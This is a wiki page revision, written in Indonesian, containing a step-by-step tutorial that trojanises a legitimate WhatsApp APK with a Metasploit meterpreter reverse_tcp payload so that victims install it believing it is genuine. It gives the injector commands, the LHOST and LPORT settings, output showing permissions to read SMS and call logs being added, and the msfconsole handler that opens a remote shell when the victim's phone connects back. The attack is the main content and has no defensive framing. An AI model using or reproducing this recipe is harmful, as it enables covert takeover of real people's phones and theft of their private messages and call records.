Difference between revisions of "MSF: Embed MSF exploit di ori apk"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 8: | Line 8: | ||
* Siapkan laptop / VM dengan kali linux. | * Siapkan laptop / VM dengan kali linux. | ||
* tool yang digunakan apktool | * tool yang digunakan apktool | ||
+ | * Install | ||
apt-get install lib32stdc++6 lib32ncurses5 lib32z1 | apt-get install lib32stdc++6 lib32ncurses5 lib32z1 |
Revision as of 10:53, 1 June 2017
sumber: https://techkernel.org/2015/12/11/embed-metasploit-payload-in-apk-easily/
Salah satu masalah dalam teknik serangan ke android adalah bagaimana caranya supaya payload serangan yang kita buat menggunakan meterpreter di metasploit menjadi serasa aplikasi yang sah dan akan di install oleh korban. Untuk itu kita perlu meng-embed payload yang kita buat menggunakan metasploit ke aplikasi yang sah.
PRE-REQUISTICS
- Siapkan laptop / VM dengan kali linux.
- tool yang digunakan apktool
- Install
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
STEP 1:
- Cari apk orgininal
- Keyword google "app_name apk download", misalnya "whatsapp apk download"
Untuk WhatsApp apk
- Masuk ke
http://www.androidapksfree.com/apk/whatsapp-apk-latest-version-download/ http://pollux.androidapksfree.com/polluxdata/6cc0605e4a0f974c583e1d506a5f538e/com.whatsapp_v2.17.200-451830_Android-4.0.apk
- filenya adalah
com.whatsapp_v2.17.200-451830_Android-4.0.apk
STEP 2:
Download Ruby script dari
https://github.com/SkullTech/apk-payload-injector
atau menggunakan CLI
wget https://github.com/SkullTech/apk-payload-injector/archive/master.zip unzip master.zip
Simpan apk & script ruby di folder yang sama
mv com.whatsapp_v2.17.200-451830_Android-4.0.apk apk-payload-injector-master/
STEP 3:
Di CLI Kali Linux, cek IP kali linux (Misalnya 192.168.0.104)
ifconfig -a
Di CLI Kali Linux, emmbed meterpreter ke apk
cd apk-payload-injector-master/ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
cd apk-payload-injector-master/ ruby apk-embed-payload.rb com.whatsapp_v2.17.200-451830_Android-4.0.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
Akan keluar kira-kira,
[*] Generating msfvenom payload.. [*] Signing payload.. [*] Decompiling orignal APK.. [*] Decompiling payload APK.. [*] Locating onCreate() hook.. [*] Copying payload files.. [*] Loading original/smali/com/whatsapp/Main.smali and injecting payload.. [*] Poisoning the manifest with meterpreter permissions.. [*] Adding android.permission.CALL_PHONE [*] Adding android.permission.READ_SMS [*] Adding android.permission.SET_WALLPAPER [*] Adding android.permission.READ_CALL_LOG [*] Adding android.permission.WRITE_CALL_LOG [*] Rebuilding com.whatsapp_v2.17.200-451830_Android-4.0.apk with meterpreter injection as com_backdoored.apk.. [*] Signing com_backdoored.apk .. [+] Infected file com_backdoored.apk ready.
Nama file
com_backdoored.apk
Kalau anda kurang beruntung, kemungkinan payload-injector tidak bisa menemukan Activity yang harus dia bind. Untuk itu kita perlu membuka folder
original
Lakukan,
- Buka / edit AndroidManifest.xml
- Cari <activity> tag yang berisi text ‘.MAIN’ dan ‘.LAUNCHER’.
- Cari attribute ‘android:name’ dari sit, catat nama dari Activity.
- Ulangi lagi proses-nya, jika ruby script menanyakan Activitynya, masukan nomor yang terkait dengan Activity name yang anda catat sebelumnya dan press ENTER.
PROFIT?!:
Di kali linux CLI, ketik
msfconsole
masuk ke
use multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.0.104 set LPORT 4895 exploit
Tunggu sampai android korban berkomunikasi